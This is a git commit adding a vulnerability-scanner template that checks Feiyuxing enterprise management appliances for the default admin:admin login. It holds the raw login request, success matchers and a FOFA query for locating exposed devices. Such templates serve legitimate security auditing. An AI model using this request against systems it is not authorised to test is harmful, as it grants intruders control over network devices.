Create feiyuxing-default-login.yaml

patch-1
Dhiyaneshwaran 2023-08-21 19:34:55 +05:30 committed by GitHub
parent 5efbcf4eb7
commit a038830dd8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 53 additions and 0 deletions

View File

@ -0,0 +1,53 @@
id: feiyuxing-default-login
info:
name: Feiyuxing Enterprise-Level Management System - Default Login
author: SleepingBag945
severity: high
description: |
Attackers can log in through admin:admin, check the system status, and configure the device.
reference:
- https://github.com/wushigudan/poc/blob/main/%E9%A3%9E%E9%B1%BC%E6%98%9F%E9%BB%98%E8%AE%A4%E5%AF%86%E7%A0%81.py
metadata:
fofa-query: title="飞鱼星企业级智能上网行为管理系统"
max-request: 1
verified: "true"
tags: feiyuxing,default-login,iot
http:
- raw:
- |
POST /send_order.cgi?parameter=login HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: {{RootURL}}
Referer: {{RootURL}}/home/login.html
X-Requested-With: XMLHttpRequest
{"username":"{{username}}","password":"{{password}}"}
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"msg":"ok"'
- '"type":'
condition: and
- type: word
part: header
words:
- 'hash_key='
- type: status
status:
- 200